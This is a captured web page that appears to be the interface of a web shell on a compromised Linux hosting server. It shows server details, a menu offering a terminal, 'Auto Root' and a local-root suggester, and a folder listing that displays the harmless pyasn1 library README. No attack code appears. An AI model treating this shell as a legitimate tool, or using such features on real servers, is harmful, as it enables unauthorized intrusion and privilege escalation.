Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.60
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
python37 /
share /
doc /
alt-python37-pyasn1 /
Delete
Unzip
Name
Size
Permission
Date
Action
LICENSE.txt
1.3
KB
-rw-r--r--
2015-01-01 18:41
README.txt
1.56
KB
-rw-r--r--
2015-06-04 19:41
codecs.html
14.99
KB
-rw-r--r--
2012-11-26 14:58
constraints.html
12.32
KB
-rw-r--r--
2015-09-09 00:00
constructed.html
9.41
KB
-rw-r--r--
2012-11-26 14:58
intro.html
5.97
KB
-rw-r--r--
2012-11-26 14:58
pyasn1-tutorial.html
66.63
KB
-rw-r--r--
2012-07-04 18:54
scalar.html
19.31
KB
-rw-r--r--
2012-11-26 14:58
tagging.html
6.75
KB
-rw-r--r--
2012-11-26 14:58
Save
Rename
ASN.1 library for Python ------------------------ This is an implementation of ASN.1 types and codecs in Python programming language. It has been first written to support particular protocol (SNMP) but then generalized to be suitable for a wide range of protocols based on ASN.1 specification. FEATURES -------- * Generic implementation of ASN.1 types (X.208) * Fully standard compliant BER/CER/DER codecs * 100% Python, works with Python 2.4 up to Python 3.4 * MT-safe MISFEATURES ----------- * No ASN.1 compiler (by-hand ASN.1 spec compilation into Python code required) * Codecs are not restartable INSTALLATION ------------ The pyasn1 package uses setuptools/distutils for installation. Thus do either: $ easy_install pyasn1 or $ tar zxf pyasn1-0.1.8.tar.gz $ cd pyasn1-0.1.8 $ python setup.py install $ python setup.py test # run unit tests (optional) OPERATION --------- Perhaps a typical use would involve [by-hand] compilation of your ASN.1 specification into pyasn1-backed Python code at your application. For more information on pyasn1 APIs, please, refer to the doc/pyasn1-tutorial.html file in the distribution. Also refer to example modules. Take a look at pyasn1-modules package -- maybe it already holds something useful to you. AVAILABILITY ------------ The pyasn1 package is distributed under terms and conditions of BSD-style license. See LICENSE file in the distribution. Source code is freely available from: http://pyasn1.sf.net FEEDBACK -------- Please, send your comments and fixes to mailing lists at project web site. =-=-= mailto: ilya@glas.net